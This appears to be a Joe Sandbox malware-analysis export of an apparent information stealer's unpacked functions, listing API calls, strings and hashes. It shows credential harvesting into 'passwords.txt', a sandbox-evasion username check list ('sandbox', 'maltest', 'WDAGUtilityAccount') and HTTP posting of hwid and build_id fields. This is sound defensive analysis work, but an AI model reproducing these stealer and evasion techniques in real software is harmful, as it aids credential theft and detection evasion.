String ID:
API String ID: 838878465-0
Opcode ID: 8bf91c94cad06c74d674722624a43567f538ce166864a8ebf2d2b51266bde13a
Instruction ID: 07d55e170c93efd0b04de74733fe668fde591fcc43f76ee151d0d05817882813
Opcode Fuzzy Hash: 8bf91c94cad06c74d674722624a43567f538ce166864a8ebf2d2b51266bde13a
Instruction Fuzzy Hash: 29E11872C00218AFEF20BFF4EC89ADEBF79BB08304F25456AF255A7152DA3559849F10

Function 0008A916 Relevance: 59.7, APIs: 32, Strings: 2, Instructions: 211stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,000B73A4,000B680F), ref: 0008A9C1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008A9D9
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008A9E1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008A9ED
??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008A9F7
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA09
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA15
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA1C
StrStrA.SHLWAPI(0008B824,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA2D
StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA47
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA5A
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA64
lstrcatA.KERNEL32(00000000,000B73A8,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA70
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA7A
lstrcatA.KERNEL32(00000000,000B73AC,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA86
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA93
lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA9B
lstrcatA.KERNEL32(00000000,000B73B0,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AAA7
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AAB7
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AAC7
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AADA

Part of subcall function 0008A7D8: _memset.LIBCMT ref: 0008A815
Part of subcall function 0008A7D8: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0008AAE7), ref: 0008A830
Part of subcall function 0008A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0008A838
Part of subcall function 0008A7D8: _memmove.LIBCMT ref: 0008A8BB

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AAE9
lstrcatA.KERNEL32(00000000,000B73B4,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AAF5
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB05
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB15
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB28

Part of subcall function 0008A7D8: lstrcatA.KERNEL32(000B6803,000B6807,?,00000000,00000000,00000000,00000000,00000014,?,0008AAE7), ref: 0008A8E5
Part of subcall function 0008A7D8: lstrcatA.KERNEL32(000B6803,000B680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0008AAE7), ref: 0008A8FB

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB37
lstrcatA.KERNEL32(00000000,000B73B8,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB43
lstrcatA.KERNEL32(00000000,000B73BC,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB4F
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB5F
lstrlenA.KERNEL32(00000000), ref: 0008AB7D
CloseHandle.KERNEL32(?), ref: 0008ABAC

Strings

p-, xrefs: 0008A931
passwords.txt, xrefs: 0008AB89

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$File$lstrcpy$lstrlen$HeapPointer$AllocBinaryCloseCreateCryptHandleProcessReadSizeString_memmove_memset
String ID: passwords.txt$p-
API String ID: 1221571796-284941404
Opcode ID: 3e85416fb593110165dcf1d103933ec8e084c06fd7aac42051b61059d3c9720c
Instruction ID: 6d5730ea59423fac9d8609dfa2c9d4d20a0670ad13c3f399b57b92a3b7ce034c
Opcode Fuzzy Hash: 3e85416fb593110165dcf1d103933ec8e084c06fd7aac42051b61059d3c9720c
Instruction Fuzzy Hash: 86714A32902115ABCF017BA4FC8DDDE7BB9FF49705B024012FA51AB162DB749D059BA2

Function 0008884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00090795: StrCmpCA.SHLWAPI(?,?,?,00088863,?,?,?), ref: 0009079E

CopyFileA.KERNEL32(?,?,00000001), ref: 00088941

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 000922B0: _memset.LIBCMT ref: 000922D7
Part of subcall function 000922B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0009237D
Part of subcall function 000922B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0009238B
Part of subcall function 000922B0: CloseHandle.KERNEL32(00000000), ref: 00092392

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00088AA6
HeapAlloc.KERNEL32(00000000), ref: 00088AAD
StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00088B95
StrCmpCA.SHLWAPI(?,000B71E8), ref: 00088BAB
StrCmpCA.SHLWAPI(?,000B71EC), ref: 00088BD3
lstrlenA.KERNEL32(?), ref: 00088CF0
lstrlenA.KERNEL32(?), ref: 00088D0B

Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E

DeleteFileA.KERNEL32(?), ref: 00088D4E

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00088B8F

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 3638656634-2709115261
Opcode ID: ba83863826e30c77004345da95fcd57a5cf3e87212eb6a384ecb74ca95185e21
Instruction ID: 6c7032f8038a07316835d2e466b4445bdc81c91ad3c26eaaa9cd2c683e3529fd
Opcode Fuzzy Hash: ba83863826e30c77004345da95fcd57a5cf3e87212eb6a384ecb74ca95185e21
Instruction Fuzzy Hash: F6E10531D01119EFCF01BBA4EC4A9DE7BB5FF04304F514062FA95BB162DB21AE569B90

Function 000A4B17 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 000A4B1F
__mtterm.LIBCMT ref: 000A4B2B

Part of subcall function 000A47EA: DecodePointer.KERNEL32(FFFFFFFF), ref: 000A47FB
Part of subcall function 000A47EA: TlsFree.KERNEL32(FFFFFFFF), ref: 000A4815

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000A4B41
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000A4B4E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000A4B5B
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000A4B68
TlsAlloc.KERNEL32 ref: 000A4BB8
TlsSetValue.KERNEL32(00000000), ref: 000A4BD3
__init_pointers.LIBCMT ref: 000A4BDD
EncodePointer.KERNEL32 ref: 000A4BEE
EncodePointer.KERNEL32 ref: 000A4BFB
EncodePointer.KERNEL32 ref: 000A4C08
EncodePointer.KERNEL32 ref: 000A4C15
DecodePointer.KERNEL32(Function_0002496E), ref: 000A4C36
__calloc_crt.LIBCMT ref: 000A4C4B
DecodePointer.KERNEL32(00000000), ref: 000A4C65
__initptd.LIBCMT ref: 000A4C70
GetCurrentThreadId.KERNEL32 ref: 000A4C77

Strings

FlsFree, xrefs: 000A4B5D
FlsSetValue, xrefs: 000A4B50
FlsGetValue, xrefs: 000A4B43
KERNEL32.DLL, xrefs: 000A4B1A
FlsAlloc, xrefs: 000A4B3B

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3732613303-3819984048
Opcode ID: f6b19ce96b0fd1aeba0a7b6b4ea3f64a1581943b125f83a6ad515a82f285724e
Instruction ID: 94f37fe005633766695ba02195e5a9f4e38202668ca6eb98522f83c1077d2b56
Opcode Fuzzy Hash: f6b19ce96b0fd1aeba0a7b6b4ea3f64a1581943b125f83a6ad515a82f285724e
Instruction Fuzzy Hash: 963182349563529AE7616FB9BD0468A3BE4EB86760F101627E914931B1DFFCD401CF60

Function 0008852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

CopyFileA.KERNEL32(?,?,00000001), ref: 000885D3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00088628
HeapAlloc.KERNEL32(00000000), ref: 0008862F
lstrlenA.KERNEL32(?), ref: 000886CB
lstrcatA.KERNEL32(?), ref: 000886E4
lstrcatA.KERNEL32(?,?), ref: 000886EE
lstrcatA.KERNEL32(?,000B719C), ref: 000886FA
lstrcatA.KERNEL32(?,?), ref: 00088704
lstrcatA.KERNEL32(?,000B71A0), ref: 00088710
lstrcatA.KERNEL32(?), ref: 0008871D
lstrcatA.KERNEL32(?,?), ref: 00088727
lstrcatA.KERNEL32(?,000B71A4), ref: 00088733
lstrcatA.KERNEL32(?), ref: 00088740
lstrcatA.KERNEL32(?,?), ref: 0008874A
lstrcatA.KERNEL32(?,000B71A8), ref: 00088756
lstrcatA.KERNEL32(?), ref: 00088763
lstrcatA.KERNEL32(?,?), ref: 0008876D
lstrcatA.KERNEL32(?,000B71AC), ref: 00088779
lstrcatA.KERNEL32(?,000B71B0), ref: 00088785
lstrlenA.KERNEL32(?), ref: 000887BE
DeleteFileA.KERNEL32(?), ref: 0008880B

Strings

passwords.txt, xrefs: 000887CE

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1139693110-347816968
Opcode ID: eafca6d7817502cec113f0f5d6ba9be3e4a3708caf0f04f1e76827ac6c57caf1
Instruction ID: 281e456f1cbc67109605e016ea36ce6327e25ed2b13f3a82826be6a33392dad4
Opcode Fuzzy Hash: eafca6d7817502cec113f0f5d6ba9be3e4a3708caf0f04f1e76827ac6c57caf1
Instruction Fuzzy Hash: 4C811532901108EFCF02BBA4FD4A9DD7BB5FF08311F514062FA51AB162EB31AE159B91

Function 00081927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00081A13
lstrcmpiA.KERNEL32(000BABCC,?), ref: 00081A2E

Strings

Miller, xrefs: 00081991
timmy, xrefs: 000819AF
IT-ADMIN, xrefs: 0008197D
virus, xrefs: 000819EB
user, xrefs: 000819B9
sandbox, xrefs: 000819C3
WDAGUtilityAccount, xrefs: 000819FF
milozs, xrefs: 0008199B
test user, xrefs: 000819E1
malware, xrefs: 000819CD
Sand box, xrefs: 00081955
Peter Wilson, xrefs: 000819A5
maltest, xrefs: 000819D7
Johnson, xrefs: 00081987
CurrentUser, xrefs: 0008194B
Hong Lee, xrefs: 00081973
John Doe, xrefs: 000819F5
Emily, xrefs: 0008195F
HAPUBWS, xrefs: 00081969

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: NameUserlstrcmpi
String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
API String ID: 542268695-1784693376
Opcode ID: 04247ac8bff353e7b3aa8402aa2ad4cc5841d98b30d7eebc2f0a09ac6929a538
Instruction ID: 888a86a95eb9f4e7e509630f3dfa024a8dd27ca4d55b95ade4b3a9c85f7ca591
Opcode Fuzzy Hash: 04247ac8bff353e7b3aa8402aa2ad4cc5841d98b30d7eebc2f0a09ac6929a538
Instruction Fuzzy Hash: E221F5B0A0526C8BCB64DF15DD497D9BBF9BB4A308F0041D99058AA211CBB84EC9CF86

Function 00084B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
Part of subcall function 00084AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
Part of subcall function 00084AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00084BCD
StrCmpCA.SHLWAPI(?), ref: 00084BEB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00084D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00084DC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00084DF5

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

lstrlenA.KERNEL32(?,000B6953,",build_id,000B77C4,------,000B77B8,",hwid,000B77A4,------), ref: 000850EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00085101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0008510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0008516C
InternetCloseHandle.WININET(00000000), ref: 00085177
InternetCloseHandle.WININET(?), ref: 0008518E
InternetCloseHandle.WININET(?), ref: 0008519A

Strings

hwid, xrefs: 00084EAD
